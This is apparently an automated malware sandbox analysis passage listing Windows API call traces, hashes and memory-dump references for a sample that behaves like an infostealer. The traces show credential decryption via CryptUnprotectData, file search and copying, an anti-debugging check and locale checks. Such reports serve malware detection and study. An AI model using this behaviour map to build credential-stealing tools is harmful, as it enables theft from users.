                                        • Opcode ID: d9b800d0e9f9ae10473a4a79dff52bca969ac48b425652567245c73d238b089b
                                        • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                        • Opcode Fuzzy Hash: d9b800d0e9f9ae10473a4a79dff52bca969ac48b425652567245c73d238b089b
                                        • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 022E1B8A
                                        • StrCmpCA.SHLWAPI(?,00425264), ref: 022E1BDA
                                        • StrCmpCA.SHLWAPI(?,0042530C), ref: 022E1BF0
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022E1FA7
                                        • DeleteFileA.KERNEL32(00000000), ref: 022E2031
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022E2087
                                        • FindClose.KERNEL32(000000FF), ref: 022E2099
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 1415058207-0
                                        • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                        • Instruction ID: 17ed7108523962953716614a04a20b48d40913cdc3f6bc4e317ddf34ae306872
                                        • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                        • Instruction Fuzzy Hash: 0A12E1719203189BCB59FBA4CDA5EEDB37AAF64300F4041B9A60E62194EF745F89CF50
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022EE0C5
                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 022EE115
                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 022EE12B
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE647
                                        • FindClose.KERNEL32(000000FF), ref: 022EE659
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2325840235-0
                                        • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                        • Instruction ID: 1abcb59c951704e9f86fcd69d1cf7d4e12a5de39169595e985caae893467662b
                                        • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                        • Instruction Fuzzy Hash: F1F190715243189ACB59EBA4DDA5EEEF33ABF24700F8041E9A14E62154EF345F89CF50
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                        • LocalFree.KERNEL32(00000000), ref: 00417D22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: fc9c92efde0b069fbd0ebe8ff2a424f3e74f3b864c4600fce15a94fa6d8ee838
                                        • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                        • Opcode Fuzzy Hash: fc9c92efde0b069fbd0ebe8ff2a424f3e74f3b864c4600fce15a94fa6d8ee838
                                        • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                        APIs
                                        • memset.MSVCRT ref: 022ECABA
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                                        • memcpy.MSVCRT(?,?,?), ref: 022ECB79
                                        • lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                                        • lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                                        • lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                        • String ID:
                                        • API String ID: 1498829745-0
                                        • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                        • Instruction ID: 2c08af503c13e0fbdf5f87d3fc45c0b002e540d72ab0b34ad572449b51ee6aef
                                        • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                        • Instruction Fuzzy Hash: 1141807895421AEFDB10DFD0DC88BEEBBB8BB44304F1045A9E60AA6284D7745B84CF91
                                        APIs
                                        • memset.MSVCRT ref: 0040C853
                                        • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0085A048), ref: 0040C871
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                        • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                        • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                        • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                        • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                        • String ID:
                                        • API String ID: 1498829745-0
                                        • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                        • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                        • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                        • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                        APIs
                                        • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,0085A0F8,?,0042110C,?,00000000,?), ref: 0041696C
                                        • sscanf.NTDLL ref: 00416999
                                        • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,0085A0F8,?,0042110C), ref: 004169B2
                                        • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0085A0F8,?,0042110C), ref: 004169C0
                                        • ExitProcess.KERNEL32 ref: 004169DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID: B
                                        • API String ID: 2533653975-2248957098
                                        • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                        • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                        • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                        • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID: N@
                                        • API String ID: 4291131564-4229412743
                                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                        • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                        • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022F7E48
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 022F7E60
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 022F7E74
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022F7EC9
                                        • LocalFree.KERNEL32(00000000), ref: 022F7F89
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID:
                                        • API String ID: 3090951853-0
                                        • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                        • Instruction ID: 5dfc4d8cbe0b65a59f697f838489a01278a062af1954ac38985a9f90d1b60f36
                                        • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                        • Instruction Fuzzy Hash: E3415B71960218ABDB64DF94DC98FEDF3B5FB54700F1041A9E109A6284DB742F89CF90
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 022FBE09
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022FBE1E
                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022FBE29
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 022FBE45
                                        • TerminateProcess.KERNEL32(00000000), ref: 022FBE4C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                        • Instruction ID: 66904e2d839ba537b90f339f0b5abf305c8a958dd3c8f097508dc97e1289fb80
                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                        • Instruction Fuzzy Hash: 4721C0BC910305DFDB54DF69F9886967BE4FB0E304F50403AE90A872A4EBB05981EF49
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                        • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                        • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                        • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022E74B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022E74BB
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022E74E8
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022E750B
                                        • LocalFree.KERNEL32(?), ref: 022E7515
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                        • Instruction ID: ac2e596f8264ad7b28ded79ca0de264b4ff0e531e91211e9fc5c2b9ce0003d93
                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                        • Instruction Fuzzy Hash: 75010075A90208BBEB10DFD4DD45F9D77B9EB44704F104155FB06AA2C4D6B0AA00CB65
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 3657800372-0
                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                        • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                        • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022F9885
                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 022F9899
                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 022F98AE
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 022F98C3
                                        • CloseHandle.KERNEL32(00420ACA), ref: 022F98E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                        • Instruction ID: a4468b1a8db77ef6ba41993f3c9aab8bf6032606c7d1dabf9a8951829bf86d50
                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                        • Instruction Fuzzy Hash: BB010C79A60208FFDB60DFE4CD54BEDB7F9EF49700F004199A506A6244D7749A84CF51
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                        • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                        • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                        • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022EE709
                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 022EE759
                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 022EE76F
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022EEE46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID:
                                        • API String ID: 433455689-0
                                        • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                        • Instruction ID: d2484f52ba7a2c3e5aa87b654957175244c4dfe37349d949c1ce3eb7e6c39a22
                                        • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                        • Instruction Fuzzy Hash: 1812FA71A203189BDB58FBA4DDA5EEDB37AAF54300F4041B9A60E52198EF345F88CF51
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,022E53EB,40000001,00000000,00000000,?,022E53EB), ref: 022F9127
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                        • Instruction ID: 2550f52006e8f2b83976578b9a03c54a2d1ad19c17d673727e77d486c509de24
                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                        • Instruction Fuzzy Hash: 5B111F74214205BFDB40CF94DC98FA773AAAF89740F009578FA098B264D775E881DB60
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                        • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                        • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
